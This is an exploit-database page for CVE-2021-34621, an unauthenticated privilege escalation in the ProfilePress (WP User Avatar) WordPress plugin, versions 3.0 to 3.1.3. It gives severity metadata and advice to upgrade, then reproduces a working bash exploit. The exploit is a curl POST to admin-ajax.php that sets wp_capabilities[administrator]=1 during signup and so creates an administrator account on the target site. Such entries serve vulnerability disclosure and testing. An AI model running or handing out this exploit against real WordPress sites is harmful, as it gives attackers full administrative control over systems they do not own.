header-logo
Suggest Exploit
vendor:
WP User Avatar
by:
Numan Rajkotiya
9,8
CVSS
HIGH
Privilege Escalation
264
CWE
Product Name: WP User Avatar
Affected Version From: 3.0
Affected Version To: 3.1.3
Patch Exists: YES
Related CWE: CVE-2021-34621
CPE: 2.3:a:wordpress:wp_user_avatar:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: wordpress,wp-plugin,packetstorm,cve,cve2021,intrusive
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei Metadata: {'max-request': 3, 'framework': 'wordpress', 'vendor': 'properfraction', 'product': 'profilepress'}
Platforms Tested: ProfilePress 3.0, Apache 2.4, and Windows Build 19043.928
2021

WordPress Plugin ProfilePress 3.1.3 – Privilege Escalation (Unauthenticated)

ProfilePress WordPress plugin is susceptible to a vulnerability in the user registration component in the ~/src/Classes/RegistrationAuth.php file that makes it possible for users to register on sites as an administrator.

Mitigation:

Upgrade to the latest version of the ProfilePress plugin to mitigate this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)
# Date: 23-08-2021
# Exploit Author: Numan Rajkotiya
# Vendor Homepage: https://profilepress.net/
# Software Link: https://downloads.wordpress.org/plugin/wp-user-avatar.3.0.zip
# Version: [1] ProfilePress (Formerly WP User Avatar) 3.0 - 3.13
	   [2] WordPress 4.7 or higher
# Tested on: ProfilePress 3.0, Apache 2.4, and Windows Build 19043.928
# CVE : CVE-2021-34621

#!/bin/bash

# Exploit for WordPress Plugin ProfilePress 3.0 - 3.1.3 
# Change the name and password as per your requirement.

URL=$1

curl -X POST $URL"/wp-admin/admin-ajax.php" \
 -H "Content-Type: application/x-www-form-urlencoded" \
 -d "reg_username=numan" \
 -d "reg_email=pwned@numan.com" \
 -d "reg_password=numan" \
 -d "reg_password_present=true" \
 -d "wp_capabilities[administrator]=1" \
 -d "reg_first_name=pwned" \
 -d "reg_last_name=numan" \
 -d "action=pp_ajax_signup"